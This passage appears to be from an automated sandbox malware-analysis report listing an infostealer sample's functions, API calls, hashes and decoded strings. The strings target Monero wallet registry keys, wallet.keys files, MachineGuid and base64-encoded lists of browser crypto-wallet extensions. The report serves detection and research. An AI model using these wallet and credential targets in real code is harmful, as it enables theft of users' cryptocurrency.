                                                                                                                                                                                          • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                          • API String ID: 615783205-3586502688
                                                                                                                                                                                          • Opcode ID: e3af02543d0cc9223b939ebf4317bdeaeb44c0352839480d8d27460ff52b3ddb
                                                                                                                                                                                          • Instruction ID: 2752939033ed6a123a101a1e5a524689d760c4df5388b58626f07208cfb2fc1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3af02543d0cc9223b939ebf4317bdeaeb44c0352839480d8d27460ff52b3ddb
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC510B71E5112EABCF22EB64EC46ADD7378AF04304F5145E1BA08B7153DA30AF898F95
                                                                                                                                                                                          Function 000210F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 000210AA
                                                                                                                                                                                          • _memset.LIBCMT ref: 000210D0
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 000210E6
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,000384CC), ref: 00021100
                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00021107
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00021112
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • MHxLZWVQYXNzIFR1c2t8MHxmbWhtaWFlam9wZXBhbWxjamtuY3BncGRqaWNobmVjbXwxfDB8MHxLZWVQYXNzWEMtQnJvd3NlcnwwfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfFJpc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9w, xrefs: 000210C8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                          • String ID: MHxLZWVQYXNzIFR1c2t8MHxmbWhtaWFlam9wZXBhbWxjamtuY3BncGRqaWNobmVjbXwxfDB8MHxLZWVQYXNzWEMtQnJvd3NlcnwwfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfFJpc2UgLSBBcHRvcyBXYWxsZXR8MXxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHwxfG9w
                                                                                                                                                                                          • API String ID: 1859398019-3373799983
                                                                                                                                                                                          • Opcode ID: 51445f728642deab7012b419f8653832951e9cb3352ac54289d2c290d64a0c77
                                                                                                                                                                                          • Instruction ID: c4171b740ea38b9c8044bff14f766ee19e8c318659a39e41f864c39cf384fcd3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51445f728642deab7012b419f8653832951e9cb3352ac54289d2c290d64a0c77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DF0C27238132077F36022752C9EFEF2A9C9B51F66F205420F708EB2C1D6A9990496B8
                                                                                                                                                                                          Function 000315D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00031607
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00031626
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0003164B
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00031657
                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 0003166B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                          • API String ID: 2235053359-1211650757
                                                                                                                                                                                          • Opcode ID: 59fa7f231259349891974a52299e620dd2f8452d3187bd12bc34849c2a41877b
                                                                                                                                                                                          • Instruction ID: 30ba8680ca4273916000abdbd6a0743c727c6a62bf0a930ced797bd61a041c35
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59fa7f231259349891974a52299e620dd2f8452d3187bd12bc34849c2a41877b
                                                                                                                                                                                          • Instruction Fuzzy Hash: A11112B550121DAFEB10DB90DC89FEAB7BCEB08305F4001E5A619E6052D674AE888F20
                                                                                                                                                                                          Function 00021A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00021A65
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00021A6C
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00021AE9), ref: 00021A89
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(00021AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00021AA4
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00021AE9), ref: 00021AAD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SOFTWARE\monero-project\monero-core, xrefs: 00021A7F
                                                                                                                                                                                          • wallet_path, xrefs: 00021A9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                          • API String ID: 3466090806-4244082812
                                                                                                                                                                                          • Opcode ID: 55cc482dd57d51340082a2dfd436c8a4cdbc127564c2fc47fb10f8d62fa8a9cc
                                                                                                                                                                                          • Instruction ID: 1d62fb5d9438e2a52a77827211ad54144624bc7d3bdbdde40e0e6f12a0136c5d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55cc482dd57d51340082a2dfd436c8a4cdbc127564c2fc47fb10f8d62fa8a9cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F05E75740308BFFB105B90EC0FFAA7B78EB48B09F1501A4BB05A9090E6B0AA809670
                                                                                                                                                                                          Function 00035DF7 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00035E86
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00035EA3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035EC2
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035ED6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035EE9
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035EFD
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035F10
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031D92: GetFileAttributesA.KERNEL32(?,?,?,0002DA7F,?,?,?), ref: 00031D99
                                                                                                                                                                                            • Part of subcall function 00035B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00035B30
                                                                                                                                                                                            • Part of subcall function 00035B0B: HeapAlloc.KERNEL32(00000000), ref: 00035B37
                                                                                                                                                                                            • Part of subcall function 00035B0B: wsprintfA.USER32 ref: 00035B50
                                                                                                                                                                                            • Part of subcall function 00035B0B: FindFirstFileA.KERNEL32(?,?), ref: 00035B67
                                                                                                                                                                                            • Part of subcall function 00035B0B: StrCmpCA.SHLWAPI(?,00056A98), ref: 00035B88
                                                                                                                                                                                            • Part of subcall function 00035B0B: StrCmpCA.SHLWAPI(?,00056A9C), ref: 00035BA2
                                                                                                                                                                                            • Part of subcall function 00035B0B: wsprintfA.USER32 ref: 00035BC9
                                                                                                                                                                                            • Part of subcall function 00035B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00035C86
                                                                                                                                                                                            • Part of subcall function 00035B0B: DeleteFileA.KERNEL32(?), ref: 00035CA9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1546541418-0
                                                                                                                                                                                          • Opcode ID: 42dead1c7ed5dc87e9c571dbf8814a6a46b6659cc48016d44e4ef080c641ce4d
                                                                                                                                                                                          • Instruction ID: eb683353785370c636831aba910d20c6d0d69b5d8808871efd5f6d1b7e6bda6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42dead1c7ed5dc87e9c571dbf8814a6a46b6659cc48016d44e4ef080c641ce4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5051DAB5A0011C9BCF55DB64DC89ADDB7B9AB4C310F8144E6FA09E3251EA30ABC98F54
                                                                                                                                                                                          Function 0003BC21 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0003CBEE,?,0003CC7C,00000000,06400000,00000003,00000000,0003757F,.exe,00056C5C), ref: 0003BC6E
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0003CBEE,?,0003CC7C,00000000,06400000,00000003,00000000), ref: 0003BCA6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • uY3Bla2toY2xtaW5ncGltam1jb29pZmJ8MXwwfDB8SEFWQUggV2FsbGV0fDF8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobmpsYXBtZmJuamhvbGZqa2lpZGJjaHwxfDB, xrefs: 0003BD0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreatePointer
                                                                                                                                                                                          • String ID: uY3Bla2toY2xtaW5ncGltam1jb29pZmJ8MXwwfDB8SEFWQUggV2FsbGV0fDF8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8MXxvY2pkcG1vYWxsbWdtamJib2dmaWlhb2ZwaGJqZ2NoaHwxfDB8MHxWZW5vbSBXYWxsZXR8MXxvamdnbWNobGdobmpsYXBtZmJuamhvbGZqa2lpZGJjaHwxfDB
                                                                                                                                                                                          • API String ID: 2024441833-3993475178
                                                                                                                                                                                          • Opcode ID: 42c1c2034973d6f9e466f964bc2791058a5b16533408b0fe1699e538048ec659
                                                                                                                                                                                          • Instruction ID: 22a4f56d0ab6939856c65c8678f0b55eff266a62db59b8579b49e7db7f91b56d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42c1c2034973d6f9e466f964bc2791058a5b16533408b0fe1699e538048ec659
                                                                                                                                                                                          • Instruction Fuzzy Hash: 743196F4504745DFDB729F2588D4B27BAECBB1535DF108E2EE29B86581E3349884CB12
                                                                                                                                                                                          Function 00030B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B44
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B4B
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B79
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B95
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B9E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: Windows 11
                                                                                                                                                                                          • API String ID: 3466090806-2517555085
                                                                                                                                                                                          • Opcode ID: 5ad15fdf4ef9934cbebd848b171a673bb717163ffc3550461997e621af8ff1e8
                                                                                                                                                                                          • Instruction ID: 658fada5508542f254f5e30ba37c437278507f81f45beaa0486eaef6f5c61cf3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad15fdf4ef9934cbebd848b171a673bb717163ffc3550461997e621af8ff1e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F06275600208FBFF115BA1EC5EFAE7A7DEB48709F5500A4F605EA0A1E7B199809730
                                                                                                                                                                                          Function 00030BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BBD
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BC4
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BE2
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ), ref: 00030BFD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030C06
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: CurrentBuildNumber
                                                                                                                                                                                          • API String ID: 3466090806-1022791448
